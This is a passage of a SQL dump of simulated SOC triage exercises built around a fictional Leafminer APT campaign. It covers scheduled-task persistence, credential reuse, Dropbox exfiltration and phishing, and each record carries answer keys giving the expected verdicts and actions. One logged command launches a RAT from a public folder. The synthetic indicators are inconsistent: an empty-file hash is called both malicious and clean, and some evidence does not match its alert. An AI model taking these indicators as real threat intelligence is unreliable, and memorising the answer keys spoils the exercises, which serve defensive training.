'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.828Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4698,\\\"TaskCategory\\\":\\\"Scheduled Task Created\\\",\\\"ProviderName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"TimeCreated\\\":\\\"2023-10-20T14:22:15.000Z\\\",\\\"EventRecordID\\\":123456,\\\"ProcessName\\\":\\\"schtasks.exe\\\",\\\"UserData\\\":{\\\"TaskName\\\":\\\"\\\\\\\\LeafminerPersistenceTask\\\",\\\"TaskContent\\\":{\\\"Command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\leafminer_rat.exe\\\"}},\\\"ExecutionInfo\\\":{\\\"CreatorUser\\\":\\\"compromised_user\\\",\\\"CreatorDomain\\\":\\\"CORP\\\"},\\\"NetworkInfo\\\":{\\\"SourceIP\\\":\\\"10.0.0.15\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\"},\\\"FileHash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"FileName\\\":\\\"leafminer_rat.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.828Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4698,\\\"TaskCategory\\\":\\\"Scheduled Task Created\\\",\\\"ProviderName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"TimeCreated\\\":\\\"2023-10-20T14:22:15.000Z\\\",\\\"EventRecordID\\\":123456,\\\"ProcessName\\\":\\\"schtasks.exe\\\",\\\"UserData\\\":{\\\"TaskName\\\":\\\"\\\\\\\\LeafminerPersistenceTask\\\",\\\"TaskContent\\\":{\\\"Command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\leafminer_rat.exe\\\"}},\\\"ExecutionInfo\\\":{\\\"CreatorUser\\\":\\\"compromised_user\\\",\\\"CreatorDomain\\\":\\\"CORP\\\"},\\\"NetworkInfo\\\":{\\\"SourceIP\\\":\\\"10.0.0.15\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\"},\\\"FileHash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"FileName\\\":\\\"leafminer_rat.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.828Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4698,\\\"TaskCategory\\\":\\\"Scheduled Task Created\\\",\\\"ProviderName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"TimeCreated\\\":\\\"2023-10-20T14:22:15.000Z\\\",\\\"EventRecordID\\\":123456,\\\"ProcessName\\\":\\\"schtasks.exe\\\",\\\"UserData\\\":{\\\"TaskName\\\":\\\"\\\\\\\\LeafminerPersistenceTask\\\",\\\"TaskContent\\\":{\\\"Command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\leafminer_rat.exe\\\"}},\\\"ExecutionInfo\\\":{\\\"CreatorUser\\\":\\\"compromised_user\\\",\\\"CreatorDomain\\\":\\\"CORP\\\"},\\\"NetworkInfo\\\":{\\\"SourceIP\\\":\\\"10.0.0.15\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\"},\\\"FileHash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"FileName\\\":\\\"leafminer_rat.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.828Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4698,\\\"TaskCategory\\\":\\\"Scheduled Task Created\\\",\\\"ProviderName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"TimeCreated\\\":\\\"2023-10-20T14:22:15.000Z\\\",\\\"EventRecordID\\\":123456,\\\"ProcessName\\\":\\\"schtasks.exe\\\",\\\"UserData\\\":{\\\"TaskName\\\":\\\"\\\\\\\\LeafminerPersistenceTask\\\",\\\"TaskContent\\\":{\\\"Command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\leafminer_rat.exe\\\"}},\\\"ExecutionInfo\\\":{\\\"CreatorUser\\\":\\\"compromised_user\\\",\\\"CreatorDomain\\\":\\\"CORP\\\"},\\\"NetworkInfo\\\":{\\\"SourceIP\\\":\\\"10.0.0.15\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\"},\\\"FileHash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"FileName\\\":\\\"leafminer_rat.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.828Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4698,\\\"TaskCategory\\\":\\\"Scheduled Task Created\\\",\\\"ProviderName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"TimeCreated\\\":\\\"2023-10-20T14:22:15.000Z\\\",\\\"EventRecordID\\\":123456,\\\"ProcessName\\\":\\\"schtasks.exe\\\",\\\"UserData\\\":{\\\"TaskName\\\":\\\"\\\\\\\\LeafminerPersistenceTask\\\",\\\"TaskContent\\\":{\\\"Command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\leafminer_rat.exe\\\"}},\\\"ExecutionInfo\\\":{\\\"CreatorUser\\\":\\\"compromised_user\\\",\\\"CreatorDomain\\\":\\\"CORP\\\"},\\\"NetworkInfo\\\":{\\\"SourceIP\\\":\\\"10.0.0.15\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\"},\\\"FileHash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"FileName\\\":\\\"leafminer_rat.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1112, 'Lateral Movement with Stolen Credentials', 'high', 'Active Directory Logs', 'Leafminer utilized stolen credentials to move laterally across the network, accessing sensitive resources and attempting to escalate privileges.', 'Credential Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":4624,\"logon_type\":3,\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"jdoe\",\"domain\":\"CORP\",\"logon_process\":\"NtLmSsp\",\"authentication_package\":\"NTLM\",\"logon_status\":\"0x0\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"malicious.dll\"}', '2026-02-01 13:57:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Company internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Unusual login pattern detected\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"DLL used in lateral movement attempts\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(1113, 'Exfiltration via Dropbox C2 Channel', 'high', 'Network Traffic Analysis', 'Leafminer group detected exfiltrating sensitive data using Dropbox as a C2 channel. This communication was disguised to appear legitimate, but analysis revealed indicators consistent with malicious activity.', 'Data Exfiltration', 'T1030: Data Transfer Size Limits', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"src_ip\":\"10.0.0.45\",\"dest_ip\":\"198.51.100.23\",\"src_port\":\"44567\",\"dest_port\":\"443\",\"protocol\":\"HTTPS\",\"filename\":\"confidential_data_backup.zip\",\"file_hash\":\"6c1b2f3e4d5a678b9c0d123456789abc\",\"user\":\"jdoe\",\"action\":\"upload\",\"application\":\"Dropbox\",\"http_host\":\"api.dropboxapi.com\",\"user_agent\":\"DropboxClient/123.45.6\"}', '2026-02-01 13:57:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_records\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for communication.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Leafminer activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_data_backup.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File matches naming patterns of exfiltrated data.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"6c1b2f3e4d5a678b9c0d123456789abc\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known exfiltrated payload.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_records\",\"verdict\":\"internal\",\"details\":\"Internal user account involved in the incident.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1114, 'Phishing Email Detected: Fake Conference Invitation', 'medium', 'Email Gateway Logs', 'A phishing email campaign targeting Israeli academics and defense officials has been detected. The emails, posing as legitimate conference invitations, contain a link to a credential harvesting page. The objective is to trick recipients into revealing their credentials.', 'Initial Access', 'T1566.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"email_id\":\"12345abcde\",\"sender\":\"conference2023@fake-event.org\",\"recipient\":\"john.doe@university.ac.il\",\"subject\":\"Invitation to International Science Conference 2023\",\"email_server\":\"smtp.fake-event.org\",\"source_ip\":\"203.0.113.45\",\"attachment\":\"Conference_Agenda.pdf\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malicious_link\":\"http://malicious-website.com/login\",\"internal_ip\":\"192.168.1.25\"}', '2026-02-01 13:57:21', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known phishing campaign source IP.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No associated malware detected.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-website.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"PhishTank\",\"verdict\":\"malicious\",\"details\":\"Credential harvesting site.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"conference2023@fake-event.org\",\"is_critical\":true,\"osint_result\":{\"source\":\"SPAMhaus\",\"verdict\":\"malicious\",\"details\":\"Email associated with phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected: Fake Conference Invitation\",\"date\":\"2026-02-01T20:32:22.833Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1115, 'Malicious Link Analysis: Credential Harvesting Page', 'medium', 'Web Traffic Analysis', 'Upon clicking the link in the email, targets are redirected to a counterfeit website that mimics a well-known academic conference. This site is designed to trick users into entering their login credentials, which are then captured by the attackers.', 'Execution', 'T1204.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"203.0.113.45\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"referrer\":\"http://phishing-academics.com/login\",\"email_sender\":\"notify@academia-conference.com\",\"recipient_email\":\"j.doe@university.edu\",\"malicious_url\":\"http://phishing-academics.com/login\",\"http_method\":\"GET\",\"status_code\":200,\"content_type\":\"text/html\",\"username\":\"j.doe\"}', '2026-02-01 13:57:21', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://phishing-academics.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"Phishing Database\",\"verdict\":\"malicious\",\"details\":\"URL is a known phishing site mimicking academic conference logins\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"notify@academia-conference.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Email domain not associated with legitimate conferences\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host suspected to have visited a malicious site\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"referrer\\\":\\\"http://phishing-academics.com/login\\\",\\\"email_sender\\\":\\\"notify@academia-conference.com\\\",\\\"recipient_email\\\":\\\"j.doe@university.edu\\\",\\\"malicious_url\\\":\\\"http://phishing-academics.com/login\\\",\\\"http_method\\\":\\\"GET\\\",\\\"status_code\\\":200,\\\"content_type\\\":\\\"text/html\\\",\\\"username\\\":\\\"j.doe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"referrer\\\":\\\"http://phishing-academics.com/login\\\",\\\"email_sender\\\":\\\"notify@academia-conference.com\\\",\\\"recipient_email\\\":\\\"j.doe@university.edu\\\",\\\"malicious_url\\\":\\\"http://phishing-academics.com/login\\\",\\\"http_method\\\":\\\"GET\\\",\\\"status_code\\\":200,\\\"content_type\\\":\\\"text/html\\\",\\\"username\\\":\\\"j.doe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"referrer\\\":\\\"http://phishing-academics.com/login\\\",\\\"email_sender\\\":\\\"notify@academia-conference.com\\\",\\\"recipient_email\\\":\\\"j.doe@university.edu\\\",\\\"malicious_url\\\":\\\"http://phishing-academics.com/login\\\",\\\"http_method\\\":\\\"GET\\\",\\\"status_code\\\":200,\\\"content_type\\\":\\\"text/html\\\",\\\"username\\\":\\\"j.doe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"referrer\\\":\\\"http://phishing-academics.com/login\\\",\\\"email_sender\\\":\\\"notify@academia-conference.com\\\",\\\"recipient_email\\\":\\\"j.doe@university.edu\\\",\\\"malicious_url\\\":\\\"http://phishing-academics.com/login\\\",\\\"http_method\\\":\\\"GET\\\",\\\"status_code\\\":200,\\\"content_type\\\":\\\"text/html\\\",\\\"username\\\":\\\"j.doe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"referrer\\\":\\\"http://phishing-academics.com/login\\\",\\\"email_sender\\\":\\\"notify@academia-conference.com\\\",\\\"recipient_email\\\":\\\"j.doe@university.edu\\\",\\\"malicious_url\\\":\\\"http://phishing-academics.com/login\\\",\\\"http_method\\\":\\\"GET\\\",\\\"status_code\\\":200,\\\"content_type\\\":\\\"text/html\\\",\\\"username\\\":\\\"j.doe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1116, 'Persistence Attempt Detected: Credential Use', 'medium', 'Account Login Logs', 'An attacker used harvested credentials to perform multiple login attempts across university and defense-related platforms. The aim is to establish persistent access within these networks.', 'Persistence', 'T1098 - Account Manipulation', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:01Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"username\":\"jdoe\",\"event_type\":\"login_attempt\",\"platform\":\"university-portal\",\"success\":false,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"action\":\"credential_use_attempt\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"malicious_payload.exe\"}', '2026-02-01 13:57:21', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known IP used in previous APT attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalAssetDB\",\"verdict\":\"internal\",\"details\":\"Internal university server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"InternalSecurityDB\",\"verdict\":\"suspicious\",\"details\":\"Multiple failed login attempts recorded.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareDB\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareRepository\",\"verdict\":\"malicious\",\"details\":\"File frequently used in credential theft attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.835Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:01Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"platform\\\":\\\"university-portal\\\",\\\"success\\\":false,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"action\\\":\\\"credential_use_attempt\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"malicious_payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.835Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:01Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"platform\\\":\\\"university-portal\\\",\\\"success\\\":false,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"action\\\":\\\"credential_use_attempt\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"malicious_payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.835Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:01Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"platform\\\":\\\"university-portal\\\",\\\"success\\\":false,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"action\\\":\\\"credential_use_attempt\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"malicious_payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.835Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:01Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"platform\\\":\\\"university-portal\\\",\\\"success\\\":false,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"action\\\":\\\"credential_use_attempt\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"malicious_payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.835Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:01Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"platform\\\":\\\"university-portal\\\",\\\"success\\\":false,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"action\\\":\\\"credential_use_attempt\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"malicious_payload.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
